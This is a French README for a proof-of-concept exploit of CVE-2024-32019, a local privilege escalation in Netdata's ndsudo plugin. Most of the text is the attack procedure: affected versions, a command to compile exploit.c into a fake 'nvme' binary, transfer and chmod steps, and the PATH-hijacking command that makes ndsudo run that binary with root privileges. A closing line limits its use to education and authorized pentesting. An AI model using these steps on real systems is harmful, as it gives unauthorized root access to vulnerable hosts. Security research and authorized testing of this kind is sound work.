
Exploit de preuve de concept pour CVE-2024-32019 démontrant une escalade de privilèges locale via un chemin de recherche non fiable dans le plugin ndsudo de Netdata. Comprend des instructions de compilation et des étapes de déploiement.
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — ndsudo escalade de privilèges locale via chemin de recherche non fiable.
x86_64-linux-gnu-gcc -o nvme exploit.c -static
Transférez le binaire compilé vers la machine vulnérable.
Rendez-le exécutable :
chmod +x nvme
Exploitez le binaire vulnérable via la manipulation de PATH (utilisez le même chemin où vous avez téléchargé votre binaire) :
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
Ce code de preuve de concept (PoC) est fourni uniquement à des fins éducatives et de tests d'intrusion autorisés.